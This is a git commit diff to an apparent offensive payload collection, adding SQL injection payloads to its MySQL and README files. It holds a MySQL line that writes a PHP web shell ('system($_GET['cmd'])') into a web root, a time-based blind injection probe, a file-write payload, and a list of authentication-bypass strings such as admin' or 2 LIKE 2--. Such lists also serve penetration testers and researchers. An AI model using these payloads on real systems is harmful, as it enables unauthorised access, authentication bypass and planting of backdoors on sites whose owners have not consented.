Multiple update - LFI/RCE via phpinfo, Struts2 v2

2026-01-03 08:17:11 -08:00 · 2017-09-13 23:55:29 +02:00
parent c36d31ec5d
commit 1ca215d5d7
8 changed files with 547 additions and 6 deletions
--- a/injection/MySQL
+++ b/injection/MySQL
@@ -54,6 +54,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 +BENCHMARK(40000000,SHA1(1337))+
 '%2Bbenchmark(3200,SHA1(1))%2B'
+' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```


@@ -71,4 +72,5 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ##MYSQL DROP SHELL
 ```
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
+SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
 ```
--- a/injection/README.md
+++ b/injection/README.md
@@ -123,6 +123,7 @@ or true--
 " or "x"="x
 ") or ("x")=("x
 ")) or (("x"))=(("x
+or 2 like 2
 or 1=1
 or 1=1--
 or 1=1#
@@ -130,6 +131,14 @@ or 1=1/*
 admin' --
 admin' #
 admin'/*
+admin' or '2' LIKE '1
+admin' or 2 LIKE 2--
+admin' or 2 LIKE 2#
+admin') or 2 LIKE 2#
+admin') or 2 LIKE 2--
+admin') or ('2' LIKE '2
+admin') or ('2' LIKE '2'#
+admin') or ('2' LIKE '2'/*
 admin' or '1'='1
 admin' or '1'='1'--
 admin' or '1'='1'#
@@ -318,3 +327,4 @@ mysql> mysql> select version();
  - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
  - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
  - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
+  - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)